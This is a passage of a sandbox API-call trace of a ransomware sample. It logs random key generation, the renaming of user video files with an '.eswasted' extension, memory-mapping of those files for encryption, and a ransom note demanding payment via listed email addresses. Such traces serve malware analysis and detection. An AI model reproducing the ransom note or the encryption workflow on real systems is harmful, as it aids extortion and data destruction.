lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.764] SetEndOfFile (hFile=0x118) returned 1 [0082.766] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.766] CloseHandle (hObject=0x118) returned 1 [0082.768] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0082.768] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5b10 | out: hHeap=0x4a0000) returned 1 [0082.768] _aulldvrm () returned 0x0 [0082.768] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.769] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.769] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\YuB-ge.flv") returned 65 [0082.769] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4d91a8 [0082.769] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.769] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.769] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.770] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.770] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\YuB-ge.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yub-ge.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.771] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.772] SetEndOfFile (hFile=0x118) returned 1 [0082.772] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.772] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.772] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\YuB-ge.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yub-ge.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\YuB-ge.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yub-ge.flv.eswasted")) returned 1 [0082.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\YuB-ge.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\yub-ge.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0082.773] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.773] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10917 [0082.773] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10917) returned 0xb10000 [0082.773] CloseHandle (hObject=0x110) returned 1 [0082.777] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.777] CloseHandle (hObject=0xf8) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.778] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.780] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.780] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.780] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.781] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.781] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) [0082.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0082.837] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.837] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kLgWbeRzRUNNwGXqVeQnDyfcYygb+5wziDT00fKG7/XCLCdDsNtDywAzO8VPkHxp\r\nJGUXxrWhhRGW5oJ0W0eSXQ8kpdcPmODEm4TcgChJStYniEGN/0Dkncn35x/oPnh+\r\n7c+h3qfanCJEAOjxcqU5hnS5UvDF5MxeeFYnm+KdYNoe3RbpXhF7drImAALB0wFe\r\nsQQIqaY1llN4DyUlrCB2sXXVh2PHyHZUq7Hc91cA01ChpPqRXV0Y4O+PQGlF89kt\r\n0kRAGhhz41p5xzF/8Pfr2Uwixgt7wjJPSn1GI2dNCYW00T/2m2p9tV+ybzsxFM+l\r\nBaTSx1cfvhlEbevbkk/kKtnOtooMJV7Yx4eIIdrZaf4xaY2ymFiZt/ndhFnVBQ1M\r\nE0DPcvlgjF99VM0+uGof+iIcFupZ+WAqqPWLlmd+0Z79qsHYpqXDb8V8uqcKcqon\r\nDKCj6DfjVmy41+4339sNqRSUqs5olR4IN86yT82h5L4pn7y3txnRgmLIIEesB47d\r\nB38GK8KUl5/z120cKwQMzoNNS8RHKVMokvwEZp7PxZlbCZJtFOairkxj2YiabOjv\r\n46RR//tb1VCTRkgKrHtjoueNRvH8vdLRCcTqRtwlV0EuMb3WvHARgctVusb8K74G\r\nuaehqqvbPy/nRQjO4CrfLjAboTMGUcq5f6uQZk3jZZD=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.837] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.837] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.837] SetEndOfFile (hFile=0x118) returned 1 [0082.839] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.839] CloseHandle (hObject=0x118) returned 1 [0082.841] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.841] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4faaa8 | out: hHeap=0x4a0000) returned 1 [0082.841] _aulldvrm () returned 0x0 [0082.841] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.842] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.842] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ZtX3Lcy8TzLapku1qW.mkv") returned 77 [0082.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4d91a8 [0082.842] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.842] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.843] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.843] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ZtX3Lcy8TzLapku1qW.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ztx3lcy8tzlapku1qw.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.844] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.845] SetEndOfFile (hFile=0x118) returned 1 [0082.845] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.845] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.845] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ZtX3Lcy8TzLapku1qW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ztx3lcy8tzlapku1qw.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ZtX3Lcy8TzLapku1qW.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ztx3lcy8tzlapku1qw.mkv.eswasted")) returned 1 [0082.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\ZtX3Lcy8TzLapku1qW.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ztx3lcy8tzlapku1qw.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.846] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.846] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xe6d0 [0082.846] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe6d0) returned 0x2d0000 [0082.846] CloseHandle (hObject=0xf8) returned 1 [0082.849] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.850] CloseHandle (hObject=0xfc) returned 1 [0082.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.850] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.851] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.851] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.851] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.851] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.851] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.860] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0082.860] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.860] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.860] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Jcar/iRKaf2gbWVqKJ0l+3uJaTW7F1CfGaRHJOrXkckCPq4OPl899cmWp/EB7ZbP\r\n6KLPyYDl7iETyVM/LNDVyob1w+x+9BKf+0mxBbf43GuyjRGa2rv1CtXKWvZs0k1Y\r\nRhnHCcPePfjYFHigpgkC722it0yl1qRs6vQnUMliScbKds5wfoxdVDVO/bT+faBu\r\nXtsxgrC8BZn+QGS7m49Bl//bWRgkbaxIlCpMmnGK9sreVGjvGKdSzmco57EaEPUn\r\nkNEbN5N3wvwub3sjZP13dVTZ5gV/1AypR3IqlZIkyEJxmp4LIC1pkLcKYHhV8Rjt\r\nhVyAuDOq3RpRqcJBKsftx6lEyip/W2OvEPl5nKZsYFX3dHJg11G6jIDxoUTiH3Rd\r\nI9FxjbWqSxwRFlTkLSuTLet5IEGyhfHMgue/hC+g1i1msLwYq6hs202BBCNWHO0P\r\nsa/BdPmu8qH5PTSxsq/GcUoIuiZx/KulRh+u7gX1avFixxG2PLtpVHk+m3YuazCi\r\nGeIUSr1byp4nzu8wGE+3KDelmH3Qntwi5XRipCzwZlcdPaUzTEHKHsQtIYgfrFd0\r\nLsp5LR1MiDf/fjNzii7kI2c456h0VY7lGePO2MeYhjwRoFxAomiowMI1oALx8ZW/\r\nVV8TUcnEPmPnVJKSW/ng3Ax6zGR/4B6kIbjAlylruuh=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.860] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.860] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.860] SetEndOfFile (hFile=0x118) returned 1 [0082.863] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.863] CloseHandle (hObject=0x118) returned 1 [0082.867] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.867] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5c08 | out: hHeap=0x4a0000) returned 1 [0082.867] _aulldvrm () returned 0x0 [0082.867] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.868] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.869] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\_VcR_2hx_Z Ysp_jG.flv") returned 76 [0082.869] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d91a8 [0082.869] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.869] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.869] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.870] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.870] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\_VcR_2hx_Z Ysp_jG.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\_vcr_2hx_z ysp_jg.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.871] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.873] SetEndOfFile (hFile=0x118) returned 1 [0082.873] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.873] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.873] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\_VcR_2hx_Z Ysp_jG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\_vcr_2hx_z ysp_jg.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\_VcR_2hx_Z Ysp_jG.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\_vcr_2hx_z ysp_jg.flv.eswasted")) returned 1 [0082.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\_VcR_2hx_Z Ysp_jG.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\_vcr_2hx_z ysp_jg.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.875] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.875] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x16172 [0082.875] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16172) returned 0xb10000 [0082.875] CloseHandle (hObject=0xfc) returned 1 [0082.900] UnmapViewOfFile (lpBaseAddress=0xb10000) [0082.901] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.901] CloseHandle (hObject=0xf8) returned 1 [0082.901] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0082.901] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.902] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0082.902] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.902] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.903] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.903] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0082.911] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.911] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]D6VyW8SWM+PykCzeYdBKUqCJXnnYqZh/ObbSXbwgiSuyygSIwI9zrDgArRYVHfto\r\n7CnCDe10i5jMbz9L0pItinDk3gSO1NOyIiFnce0sR4F6QFKjM4XQwza2GhlyaObm\r\nMCP+nmeqmjP0bP0BkV2tb+ssPL4BXmb0cTqLlwu3J/pPW0q1ElkgUVAAffkVKNYL\r\nDekLq7O2Kf/y6iLaaKpXc8SJhSDiqTUbNQUbBEr5ErrUJJPoOd6Y1wH3tsvEHOS7\r\nq/Y1m2dauEpe0Ybp929bF8oFjS4exY8NHEQDxm4VzvY+E1FcBixrdIeGQYYaSw6e\r\nTshG6OhJOl7eV0SSxOVi0+7DNVASGvxQIdvpI2cU76e83+4wk2Jiuq5iMKqTftOS\r\nZhbXaWpVJVB0KwfnSfhQu1HiqCLNoDGsktebBGfXaNTwkVYipfsToKhnTJHKFdn8\r\nCD3mf9d930fxiEzg3f4UFkIlrCMoXSo1JB09qeHOQtjFHlSy9Eh3J+Buy9bsKNjK\r\nj5PTW7fS5C6SEwz4dD3KE2Qsp6qHQKh3QRxCrR/LHvHEHS8pNlnTlxQL+J1F4CVU\r\nJdsgzhDGJg159ooGrFcntVpnJrYdowsrZIucnoQagQKKPP6M5q9FX2K9pkVp8Owo\r\nA0qQnwCcl2xMx2KYTUwZJvUZt5qFtn43ghc5/tKyXFS=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.911] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0082.911] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.911] SetEndOfFile (hFile=0x118) returned 1 [0082.913] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.914] CloseHandle (hObject=0x118) returned 1 [0082.916] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.916] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5d00 | out: hHeap=0x4a0000) returned 1 [0082.916] _aulldvrm () returned 0x0 [0082.916] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.917] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.917] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.917] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0082.917] RtlAllocateHeap 